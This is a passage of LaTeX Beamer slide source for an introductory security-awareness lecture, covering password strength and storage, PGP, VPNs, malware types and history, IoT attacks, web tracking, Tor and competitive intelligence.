Force} \begin{tikzpicture} \begin{axis}[ height=0.67\textwidth, width=\textwidth, xmajorgrids=true, xlabel=Lenght of the password, ylabel=Time in second, xmin=4, xmax=16, ymin=0, ymax={10^(16)}, xtick={4,...,16}, ymode=log, log basis y={10}, enlargelimits, domain=4:16, legend entries={26 characters, 62 characters, 105 characters}, legend style={font=\small}, legend cell align=right, legend pos=north west, title={3GHz PC (- - - 8 cores)} ] \addplot[color=red]{(26)^x/3000000000}; \addplot[color=blue]{(62)^x/3000000000}; \addplot[color=green]{(105)^x/3000000000}; \addplot[dashed,color=red]{(26)^x/24000000000}; \addplot[dashed,color=blue]{(62)^x/24000000000}; \addplot[dashed,color=green]{(105)^x/24000000000}; \addplot[color=green]{(105)^x/3000000000}; \addplot[dotted,color=black,domain=0:16]{1} node[above]{{\tiny 1 seconde}}; \addplot[dotted,color=black,domain=0:16]{60} node[above]{\tiny 1 minute}; \addplot[dotted,color=black,domain=0:16]{3600} node[above]{\tiny 1 heure}; \addplot[dotted,black,domain=0:16]{86400} node[above]{\tiny 1 jour}; \addplot[dotted,color=black,domain=0:16]{31536000} node[above]{\tiny 1 ann\'ee}; \addplot[dotted,color=black,domain=0:16]{3153600000} node[above]{\tiny 1 si\`ecle}; \end{axis} \end{tikzpicture} \end{frame} \begin{frame}{Few Advices} \begin{columns}[c] % the "c" option specifies center vertical alignment \column{6cm} % column designated by a command A password \begin{enumerate} \item Does not lend itself \item Does not get left behind \item Can only be used once \item If it is broken, it must be changed \item It must be changed regularly \item It is never sophisticated enough \item Size matters. \end{enumerate} \column{4cm} % column designated by a command \includegraphics[width = 4cm]{mots-de-passes.jpg} \pause \includegraphics[height=3.5cm]{sida-sully-pixel1.jpg} \hfill~ \end{columns} \end{frame} \begin{frame}{Data bases leakage} \begin{center} \includegraphics[height= 2cm]{RockYou-Pass.png} \includegraphics[height= 4cm]{adobe-passwords-copy.jpg} \end{center} Olivier Heen, Christoph Neumann: On the Privacy Impacts of Publicly Leaked Password Databases. DIMVA 2017 \end{frame} \begin{frame}{How to store a password ?} \begin{block}{Storage} \begin{itemize} \item In clear \item Hash (pwd) $\Rightarrow$ Rainbowtables ! \item Hash (pwd + Salt) \item Hash (pwd + Salt-user) \item bcrypt(pwd + Salt-user) (bcrypt = slow hash) \item AES(bcrypt(pwd + Salt-user), SecretKey) \end{itemize} \end{block} \end{frame} \begin{frame}{John the Ripper} \begin{center} \includegraphics[width=4cm]{john-the-ripper-crack-password-office-gpu.png} \url{www.openwall.com/john/} \end{center} \end{frame} \begin{frame}{KeePassXC} \begin{center} \includegraphics[width=4cm]{keepassxc-logo.png} \url{https://keepassxc.org/} \end{center} \end{frame} \begin{frame}{Wireshark} \begin{center} \includegraphics[width=4cm]{logo_wireshark.jpeg} \url{https://www.wireshark.org/} \end{center} \end{frame} \begin{frame}{2) BYOD : Bring Your Own Device} \begin{itemize} \item Smartphone, tablette, personal computers \item Remote cxonnexion to companie network \item New threats (Security, Law, ...) \end{itemize} \begin{center} \includegraphics[height=2cm]{IMAGES/BYOD} \end{center} \pause \begin{block}{Solutions} Protect, access control, (VPN, HTTPS), anticipation and \centering \textcolor{red}{EDUCATION} \end{block} \pause CYOD : Choose Your Own Device \hfill FYOD : Fix Your Own Device DYOD : Download on Your Own Device \end{frame} \begin{frame}{Emails and attachments} In Octobre 2014. \vfill \begin{columns}[c] % the "c" option specifies center vertical alignment \column{5.5cm} % column designated by a command \includegraphics[width=5.5cm]{Glenn-tv.jpg} \column{5.5 cm} % column designated by a command \includegraphics[width=2.5cm]{TED.png} \medskip {\bf Why privacy matters?} \medskip by Glenn Greenwald \medskip \end{columns} \vfill \vspace{1cm} Nothing to hide ... \vfill %% \emph{``Voici mon e-mail. Quand vous rentrerez chez vous, envoyez-moi les %% mots de passe de toutes vos bo\^ites mail, pas simplement les jolies %% et respectables, je les veux toutes. Je veux juste y jeter un coup %% d'oeil, voir ce que vous faites en ligne, lire et publier ce que j'y %% trouverai d'int\'eressant. Apr\`es tout, si vous n'\^etes pas %% malveillant, si vous ne faites rien de mal, vous ne devriez rien %% avoir \`a cacher.''} %% \begin{flushright} %% Glenn Greenwald %% \end{flushright} %\medskip \hfill \includegraphics[width=3cm]{Glenn.jpg} \url{http://jenairienacacher.fr/} \end{frame} \begin{frame}{Default email security} \begin{center} \hfill \includegraphics[width=3cm]{email-Messagerie} \hfill \includegraphics[width=3cm]{post-card} \hfill~ \end{center} \end{frame} \begin{frame} \frametitle{First requirement by E.~Snowden ...} \begin{columns}[c] % the "c" option specifies center vertical alignment \column{5cm} % column designated by a command \includegraphics[width=5cm]{citizenfour.jpg} \column{6cm} % column designated by a command \includegraphics[width=5cm]{2_citizenfour.jpg} \medskip \includegraphics[width=5cm]{citizenfourpgp.jpg} \end{columns} \begin{flushright} {\Large... use PGP} \end{flushright} \end{frame} \begin{frame} \frametitle{Pretty Good Privacy \includegraphics[width=2cm]{pgp-logo.jpg}} Software to encrypt, decrypt, sign email, desinged by Phil Zimmermann in 1991.% selon la RFC 4880. \bigskip \hfill \includegraphics[width=2.5cm]{pgp_logo.jpg} \hfill \includegraphics[width=2.5cm]{P-zimmermann.jpg} \hfill ~ \bigskip \begin{center} \textcolor{red}{If privacy is outlawed, only outlaws will have privacy} \end{center} \end{frame} \begin{frame} \frametitle{Is it difficult?} \begin{columns}[c] % the "c" option specifies center vertical alignment \column{7cm} % column designated by a command \begin{enumerate} \item Install GPG \item Generate a pair of keys $\geq 4096$ bits \item Import them \item Get your friends key \item Send signed and encrypted emails. \end{enumerate} \begin{center} \includegraphics[width=2.5cm]{email-chiffre} \end{center} \column{4cm} % column designated by a command \includegraphics[width=3cm]{homer-brain.jpg} \bigskip \includegraphics[width=3cm]{logo-gnupg-light-purple-bg.png} \end{columns} \pause \begin{center} {\bf ``Now, my correspondence with friends has become secure!''} \end{center} \end{frame} \begin{frame} \frametitle{4) Virtual Private Network} \begin{center} \includegraphics[width=11cm]{VPN-null.jpg} Using cryptography to securely work in remote ! \end{center} \end{frame} \begin{frame} \frametitle{5) Security Updates} \begin{center} \includegraphics[width=3cm]{Security-Update.png} \end{center} \begin{itemize} \item Fix vulnerabilities \item Patch problems \item Update protocols \item CRL (Certificate Revocation List) \end{itemize} \end{frame} \begin{frame} \frametitle{6) Malwares and Antivirus} \vspace{-.5cm} \hspace*{-1cm} \begin{tikzpicture} \node (mal) at (0,0) {\textbf{malware:} the computer does what the attacker wants.}; \node[inner sep=0pt, right of=mal, xshift=5cm] (imal) {\includegraphics[width=.2\textwidth]{IMAGES/malware.png}}; \pause \node[below of=mal, yshift=-0.7cm, xshift=2.5cm] (vi) {\textbf{virus:} program that infects other computers.}; \node[inner sep=0pt, left of=vi, xshift=-4cm] (ivi) {\includegraphics[width=.2\textwidth]{IMAGES/virus.jpeg}}; \pause \node[below of=vi, yshift=-0.7cm, xshift=-3cm] (wo) {\textbf{worm:} same as virus but automatic propagation.}; \node[inner sep=0pt, right of=wo, xshift=5cm] (iwo) {\includegraphics[width=.2\textwidth]{IMAGES/worm.jpeg}}; \pause \node[below of=wo, yshift=-0.7cm, xshift=3cm] (ra) {\textbf{~ransomware:} encrypts computer's data unless ransom.}; \node[inner sep=0pt, left of=ra, xshift=-4.5cm] (ira) {\includegraphics[width=.2\textwidth]{IMAGES/ransom.png}}; \pause \node[below of=ra, yshift=-0.5cm, xshift=-3cm] (tro) {\textbf{trojan: } program that seems harmless but malicious.}; \node[inner sep=0pt, right of=tro, xshift=5cm] (itro) {\includegraphics[width=.15\textwidth]{IMAGES/trojan.png}}; \end{tikzpicture} \end{frame} \begin{frame}{Short History} \begin{tikzpicture} \draw[->, very thick] (0,0)--(10.5,0); \draw[-, very thick] (0.5,-0.25)--(0.5,0.25); \node (a) at (0.5,0.5) {1982}; \node (ap) at (0.5,-1) {Elk Cloner}; \node[below of=ap, yshift=-1.5cm] (ia) {\includegraphics[width=.2\textwidth]{IMAGES/Rich-Skrenta.jpg}}; \pause \draw[-, very thick] (3,-0.25)--(3,0.25); \node (b) at (3,0.5) {1986}; \node (bp) at (3,-1) {Brain}; \node[below of=bp, yshift=-1cm] (ib) {\includegraphics[width=.25\textwidth]{IMAGES/brain.jpeg}}; \pause \draw[-, very thick] (6,-0.25)--(6,0.25); \node (c) at (6,0.5) {1988}; \node (cp) at (6,-1) {Morris Worm}; \node[below of=cp, yshift=-1cm] (ic) {\includegraphics[width=.25\textwidth]{IMAGES/morris_worm.png}}; \pause \draw[-, very thick] (9,-0.25)--(9,0.25); \node (d) at (9,0.5) {1989}; \node (dp) at (9,-1) {AIDS/PC}; \node[below of=dp, yshift=-1cm] (id) {\includegraphics[width=.25\textwidth]{IMAGES/aids.png}}; \end{tikzpicture} \end{frame} \begin{frame} \frametitle{Virus Phases} \begin{itemize} \item Dormant phase \item Propagation phase. \item Triggering phase. \item Action phase. \end{itemize} \end{frame} \begin{frame} \frametitle{Perfect Antivirus cannot exist} Virus Detection is Undecidable \begin{block}{Theorem by Fred Cohen (1987) } Virus abstractly modeled as program that eventually executes infect Code where infect may be generated at runtime \end{block} Proof by contradiction similar to that of the halting problem. Suppose isVirus (P) determines whether program P is a virus Define new program Q as follows: Q: if (not isVirus (Q)) then Q infects else Q stops Running isVirus on Q achieves a contradiction, two cases \begin{itemize} \item isVirus(Q) is true $\Rightarrow$ Q does nothing \item isVirus(Q) is false $\Rightarrow$ Q infects \end{itemize} \end{frame} \begin{frame} \frametitle{7) Backup and Storage} \begin{center} \includegraphics[width=10cm]{Photo-Storage-Backup-DO-IT-RIGHT.jpg} \end{center} \end{frame} %% \begin{frame} %% \frametitle{} % %% \centering %% \includegraphics[scale=0.45]{chat-souris} %% \end{frame} \pgfdeclareimage[interpolate=true,height=1cm]{lettre}{IMAGES/lettre1} \pgfdeclareimage[interpolate=true,height=2cm]{alice}{IMAGES/ALICE01} \pgfdeclareimage[interpolate=true,height=2cm]{bob}{IMAGES/whiterabbit01.jpg} \pgfdeclareimage[interpolate=true,height=1.5cm]{intrus}{IMAGES/cheshire01.jpg} \pgfdeclareimage[interpolate=true,height=1.5cm]{chiffre}{IMAGES/chest121.jpg} %\pgfdeclareimage[interpolate=true,height=.8cm]{k3}{key3.jpeg} %\pgfdeclareimage[interpolate=true,height=.8cm]{k1}{key2.png} \pgfdeclareimage[interpolate=true,height=.8cm]{kpub}{clef_publique.pdf} \pgfdeclareimage[interpolate=true,height=.8cm]{kpriv}{clef_privee.pdf} \pgfdeclareimage[interpolate=true,height=.8cm]{k2}{IMAGES/key-300} \pgfdeclareimage[interpolate=true,height=.8cm]{ksym}{pure_clef_sym.pdf} \begin{frame} \frametitle{8) Internet of Things (IOT)} \begin{columns}[c] % the "c" option specifies center vertical alignment \column{5cm} % column designated by a command \begin{center} \includegraphics[width=4cm]{IMAGES/iotblue.jpg} \end{center} \column{7cm} % column designated by a command \begin{block}{Technology} \begin{itemize} \item Wireless : Wifi, 3G, 4G, 5G, Bluethooth, Sigfox ... \item Batteries \item CPU \item Sensors \item Price \end{itemize} \end{block} \pause \begin{block}{Usage} \begin{itemize} \item Monitoring \item Hyperconnectivity \item Avaibility %\item Performances \end{itemize} \end{block} \end{columns} \end{frame} \begin{frame} \frametitle{Attacks since 2007 ...} \vspace{-.5cm} \centering \includegraphics[width=3cm]{router-2.jpg} \includegraphics[width=2cm]{webcam.png} \includegraphics[width=3cm]{Samsung_Smart_TV_2265998b.jpg} \includegraphics[width=3cm]{foscam.jpg} \pause \includegraphics[width=3cm]{smartfridge.jpg}\hfill \includegraphics[width=2cm]{A1-KEY-PAD-300X274.jpg}\hfill \includegraphics[width=3cm]{Samsung-Printers-Can-Be-Attacked-Company-Promised-to-Issue-Fix-Today.jpg} \pause \includegraphics[width=3cm]{Toyota-Prius-7.jpg} \hfill \includegraphics[width=3cm]{medtronic.jpg} \hfill\includegraphics[width=3cm]{pacemaker.jpg} \end{frame} \begin{frame} \frametitle{9) Where are your data ?} \begin{center} \includegraphics[width=7cm]{user-data.png} \end{center} \end{frame} \begin{frame} \frametitle{Free ?} \begin{center} \includegraphics[width=7cm]{pigs-and-the-free-model.jpg} \end{center} \end{frame} \begin{frame} \frametitle{Buisness Model} \begin{center} \includegraphics[width=8cm]{gafam-free.jpg} \textcolor{red}{If it is free then you are the product} \end{center} \end{frame} \begin{frame} \frametitle{Buisness Model} \begin{center} \includegraphics[width=8cm]{zukerberg-thanks.jpg} \end{center} \end{frame} \begin{frame} \frametitle{10) Phising} \vspace{-1cm} \hfill \includegraphics[height=2cm]{phishing} \centering \includegraphics[height=5cm]{Fack-Facebook-Security-Team-Message.jpg} \end{frame} \section{Security and you ?} \begin{frame}{Computer Security is already there} \begin{center} \hfill \includegraphics[width=3cm]{carte-vitale.jpg} \hfill \includegraphics[width=3cm]{new-york-liberty-credit-card} \hfill~ \bigskip \hfill \includegraphics[width=3cm]{samsung} \hfill \includegraphics[width=3cm]{cplus} \hfill~ %\bigskip \end{center} \end{frame} \begin{frame}{Take good habits, it takes time ...} \begin{center} \hfill \includegraphics[height=3.5cm]{arton1114.jpg} \hfill \includegraphics[height=3.5cm]{casque.jpg} \hfill~ \medskip \hfill \includegraphics[height=1.82cm]{attachealavie.jpg} \hfill \includegraphics[height=2.1cm]{capote.jpg} % \includegraphics[height=1.9cm]{piscine.jpg} \hfill ~ \end{center} \begin{center} \Large{event when it is vital} \end{center} \end{frame} \begin{frame}{} \begin{center} \Large{Become actor of its digital security} \pause \bigskip \Large{because it is not automatic !} \end{center} \end{frame} %\section{Privacy/Tracing} \begin{frame}{Cookies} Implemented in 1994 in Netscape and described in 4-page draft \begin{itemize} \item No spec for 17 years \item Attempt made in 1997, but made incompatible changes \item Another attempt in 2000 ("Cookie2"), same problem \item Around 2011, another effort succeeded (RFC 6265) \item Ad-hoc design has led to interesting issues \end{itemize} \end{frame} \begin{frame}[fragile] {Cookies attributes} \begin{itemize} \item Expires - Specifies expiration date. If no date, then lasts for session {\bf Browsers do session restoring, so can last way longer!} \item Path - Scope the "Cookie" header to a particular request path prefix \item Domain - Allows the cookie to be scoped to a domain broader than the domain that returned the Set-Cookie header \end{itemize} \begin{center} \verb+Set-Cookie: theme=dark; Expires=;+ \end{center} \end{frame} \begin{frame}{Fingerprinting, passive tracking} Find things different about each visitor to re-identify users! \begin{block}{Exemple} \begin{itemize} \item Browsers used \item OS used \item Fonts installed \item Plugins installed \item Video/Audio Hardware \item Software installed \end{itemize} \end{block} \begin{center} {\bf You are unique !} \end{center} \begin{small} \url{https://panopticlick.eff.org} \url{https://audiofingerprint.openwpm.com/} \url{https://www.leblogduhacker.fr/ce-que-lon-sait-sur-vous/} \url{https://history.google.com/history/} \end{small} \end{frame} \begin{frame}{Google Safe Browsing} \begin{center} \includegraphics[width=8cm]{Google-safe.jpg} \end{center} Google maintains a list of known malware/phishing URLs \url{https://testsafebrowsing.appspot.com/s/phishing.html} With Chrome ! Of course ! \end{frame} \begin{frame}{Google Safe Browsing} \begin{center} \includegraphics[width=7cm]{Google-safe-histo.jpg} \url{https://transparencyreport.google.com/safe-browsing/overview} \end{center} \begin{itemize} \item Browser queries the list on every navigation {\bf NO} \item Send URLs to the Google Safe Browsing server to check their status \item Privacy: URLs are not hashed, so the server knows which URLs you look up \end{itemize} \url{https://testsafebrowsing.appspot.com/} \end{frame} \begin{frame}{Shodan} \begin{center} First search engine for Internet-connected devices. \end{center} \includegraphics[height=6cm]{Shodan-example.png} \url{https://www.shodan.io/} \end{frame} \begin{frame}{} \begin{itemize} \item Google \item Facebook \item Twitter \item Linkedin \item WebPage \item Recherche Sur Twitter \url{https://followerwonk.com/} \item Search by Name and Find People in the USA. \url{https://www.zabasearch.com/} \item Trouvez une entreprise, un particulier partout dans le monde \url{https://www.infobel.com/} \item Lullar informations \`a partir d'email \url{https://lullar-com-3.appspot.com/en} \item Spokeo informations sur les r\'eseaux sociaux \url{https://www.spokeo.com/} \end{itemize} \end{frame} \begin{frame}{Webmii} \begin{center} People search engine \end{center} \includegraphics[height=6cm]{Webmii.png} \url{https://webmii.com/} \end{frame} \begin{frame}{Cookieless cookies} Utilisation des ETag ! \begin{itemize} \item Le navigateur envoie au serveur Apache, l’ETag du fichier qu’il s’apprête à lui demander et qu’il possède dans son cache. \item Si l'ETag est identique $\Rightarrow$ pas besoin de le télécharger ! CQFD \end{itemize} \begin{center} \includegraphics[height=4cm]{etags.jpg} \end{center} \url{http://lucb1e.com/rp/cookielesscookies/} \end{frame} \begin{frame}{Counter measure: Electronic Frontier Foundation} \begin{center} \includegraphics[width=7cm]{Panopticlick.png} \url{https://panopticlick.eff.org/} \end{center} \end{frame} \section{ToR} \begin{frame}{Application : The Onion Router (TOR) \includegraphics[width=1cm]{306px-Tor-logo-2011-flat.png}} \begin{center} \includegraphics[width=11cm]{IMAGES/tor_network.pdf} \end{center} \url{https://www.torproject.org} \end{frame} \begin{frame}{Application : \includegraphics[width=1cm]{306px-Tor-logo-2011-flat.png}} \begin{center} \includegraphics[width=11cm]{tor_onion_layers.pdf} \end{center} \end{frame} \section{Competitive Intelligence (Intelligence \'Economique)} \begin{frame} \frametitle{Competitive Intelligence} Control and protection of strategic information useful for any economic actor %Ma\^itrise et protection de l'information strat\'egique utile pour %tout acteur \'economique \begin{center} \includegraphics[width=4cm]{IMAGES/epita_intelligence_eco.jpg} \end{center} \begin{block}{3 piliers} \begin{itemize} \item Information mastery, knowledge management \item Protection of information assets \item Influence strategy and lobbying %% Ma\^itrise de l'information, management des connaissances %% \item Protection du patrimoine informationnel %% \item Strat\'egie d’influence et lobbying \end{itemize} \end{block} %% La comp\'etitivit\'e est la finalit\'e de l’IE %% (Intelligence = renseignement) \end{frame} \begin{frame}{Information mastery} \begin{itemize} \item Identify sources \item Collect information (monitoring, social networks ...) \item Exploitation: analysis and decision support %% \item Identifier les sources %% \item Collecter l'information (veille, reseaux sociaux ...) %% \item Exploitation : analyse et aide \`a la d\'ecision \item Diffusion : \end{itemize} \begin{center} \includegraphics[width=4cm]{IMAGES/systeme_d_information.jpg} \end{center} \end{frame} \begin{frame}{Protection of information} \begin{center}``\emph{\bf Only paranoiac survive}'' \end{center} \hfill Andy GROVE, Co-fondator of Intel in 1968 \ \\ \pause \begin{enumerate} \item Classification of information \item Diagnosis \item Access Protection \item Awareness \item Monitoring, detection \end{enumerate} \begin{center} \includegraphics[width=4cm]{IMAGES/6282016_small.jpg} \end{center} \end{frame} \begin{frame}{Strategies of Influence} \begin{itemize} \item Press, media \item Blog, social networks \item Crisis communication : information / disinformation \end{itemize} \begin{center} \includegraphics[width=4cm]{IMAGES/brands-maintain-culture-diverse-audience-content-2019.jpg} \end{center} \end{frame} \section{Conclusion} \begin{frame} \frametitle{Today} \begin{enumerate} \item Security \item \end{enumerate} \end{frame} \begin{frame} \frametitle{Ron Rivest} \begin{center} {\bf ``Once you have something on the Internet, you are telling the world, please come hack me.''} \ \\ \includegraphics[width=3cm]{Rivest.jpg} \end{center} \end{frame} \begin{frame}{Bruce Schneier} \begin{center} {\bf ``Security is a process, not a product.''} \ \\ \includegraphics[height=4cm]{IMAGES/bruce-schneier-by-josh-more} \end{center} \end{frame} \begin{frame} \begin{center} {\bf Merci pout votre attention} \\ \ \\ {\bf Questions?}\\ \ \\ %% \includegraphics[width=4cm]{wargames-1.jpg} \hfill \includegraphics[width=3cm]{cover} \hfill \includegraphics[width=3cm]{livre-pki2.jpg} \hfill~ %% War games, 1983 \end{center} \end{frame} \end{document}